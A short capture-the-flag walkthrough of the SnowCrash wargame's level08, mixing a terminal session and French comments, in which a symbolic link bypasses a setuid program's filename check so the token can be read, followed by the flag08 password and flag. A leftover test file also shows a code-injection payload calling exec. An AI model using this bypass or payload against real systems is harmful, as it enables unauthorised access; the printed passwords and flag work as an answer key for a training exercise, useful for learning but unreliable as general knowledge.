level08@SnowCrash:~$ ls -la
total 28
dr-xr-x---+ 1 level08 level08  140 Mar  5  2016 .
d--x--x--x  1 root    users    340 Aug 30  2015 ..
-r-x------  1 level08 level08  220 Apr  3  2012 .bash_logout
-r-x------  1 level08 level08 3518 Aug 30  2015 .bashrc
-r-x------  1 level08 level08  675 Apr  3  2012 .profile
-rwsr-s---+ 1 flag08  level08 8617 Mar  5  2016 level08
-rw-------  1 flag08  flag08    26 Mar  5  2016 token

level08@SnowCrash:~$ ./level08 
./level08 [file to read]
level08@SnowCrash:~$ ./level08 token 
You may not access 'token'
level08@SnowCrash:~$ ./level08 /tmp/test
[x {${exec(getflag)}}]
level08@SnowCrash:~$ mv /tmp/test /tmp/token
level08@SnowCrash:~$ ./level08 /tmp/token
You may not access '/tmp/token'

aussi un hexdump -C level08 montre un 'token' en dur dans le code comme si il faisait manuellement attention a ne pas lire les fichier dont le nom contient token.
On va donc creer un lien symbolique de /home/user/level08/token qui ne contiendra pas le nom de token.

level08@SnowCrash:~$ ln -s /home/user/level08/token /tmp/tokn
level08@SnowCrash:~$ ./level08 /tmp/tokn
quif5eloekouj29ke0vouxean
level08@SnowCrash:~$ su flag08
Password: quif5eloekouj29ke0vouxean
Don't forget to launch getflag !
flag08@SnowCrash:~$ getflag
Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f
